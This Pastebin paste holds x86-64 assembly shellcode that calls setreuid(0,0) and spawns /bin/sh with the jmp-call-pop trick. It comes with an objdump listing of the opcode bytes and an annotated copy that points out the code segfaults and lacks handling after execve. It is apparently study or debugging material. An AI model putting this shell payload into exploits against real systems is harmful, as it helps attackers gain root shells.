API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 19th, 2019
66
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.63 KB | None | 0 0
raw download clone embed print report
  1. .section .data
  2. .section .text
  3. .globl _start
  4.  
  5. _start:
  6. xor %rax, %rax
  7. mov $70, %al
  8. xor %rbx, %rbx
  9. xor %rcx, %rcx
  10. int $0x80
  11.  
  12. jmp ender
  13.  
  14. starter:
  15. pop %rbx
  16. xor %rax, %rax
  17. mov %al, 0x07(%rbx)
  18. mov %rbx, 0x08(%rbx)
  19. mov %rax, 0x0c(%rbx)
  20. mov $11, %al
  21. lea 0x08(%rbx), %rcx
  22. lea 0x0c(%rbx), %rdx
  23. int $0x80
  24.  
  25. ender:
  26. call starter
  27. .string "/bin/sh"
  28.  
  29. 0000000000400078 <_start>:
  30. 400078: 48 31 c0 xor %rax,%rax
  31. 40007b: b0 46 mov $0x46,%al
  32. 40007d: 48 31 db xor %rbx,%rbx
  33. 400080: 48 31 c9 xor %rcx,%rcx
  34. 400083: cd 80 int $0x80
  35. 400085: eb 1b jmp 4000a2 <ender>
  36.  
  37. 0000000000400087 <starter>:
  38. 400087: 5b pop %rbx
  39. 400088: 48 31 c0 xor %rax,%rax
  40. 40008b: 88 43 07 mov %al,0x7(%rbx)
  41. 40008e: 48 89 5b 08 mov %rbx,0x8(%rbx)
  42. 400092: 48 89 43 0c mov %rax,0xc(%rbx)
  43. 400096: b0 0b mov $0xb,%al
  44. 400098: 48 8d 4b 08 lea 0x8(%rbx),%rcx
  45. 40009c: 48 8d 53 0c lea 0xc(%rbx),%rdx
  46. 4000a0: cd 80 int $0x80
  47.  
  48. 00000000004000a2 <ender>:
  49. 4000a2: e8 e0 ff ff ff callq 400087 <starter>
  50. 4000a7: 2f (bad)
  51. 4000a8: 62 (bad)
  52. 4000a9: 69 .byte 0x69
  53. 4000aa: 6e outsb %ds:(%rsi),(%dx)
  54. 4000ab: 2f (bad)
  55. 4000ac: 73 68 jae 400116 <ender+0x74>
  56.  
  57. .section .data
  58. .section .text
  59. .globl _start
  60.  
  61. _start:
  62. xor %rax, %rax
  63. mov $70, %al
  64. xor %rbx, %rbx
  65. xor %rcx, %rcx
  66. ; call sys_setreuid(0,0)
  67. int $0x80
  68.  
  69. jmp ender
  70.  
  71. starter:
  72. ; take the return address off the stack
  73. ; rbx will point to the /bin/sh string after the call instruction
  74. pop %rbx
  75. ; zero rax
  76. xor %rax, %rax
  77. ; save a zero byte to the end of the /bin/sh string (it's 7 characters long)...
  78. ; (it will segfault here because you're writing to a read-only area)
  79. mov %al, 0x07(%rbx)
  80. ; ...followed by a pointer to the string...
  81. mov %rbx, 0x08(%rbx)
  82. ; ...followed by another zero value
  83. mov %rax, 0x0c(%rbx)
  84. ; setup the parameters for a sys_execve call
  85. mov $11, %al
  86. lea 0x08(%rbx), %rcx
  87. lea 0x0c(%rbx), %rdx
  88. int $0x80
  89.  
  90. ; what happens when int 0x80 returns?
  91. ; you should do something here or starter will be called again
  92.  
  93. ender:
  94. call starter
  95. .string "/bin/sh"
  96.  
  97. mov %rbx, 0x08(%rbx)
  98. mov %rax, 0x0c(%rbx)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!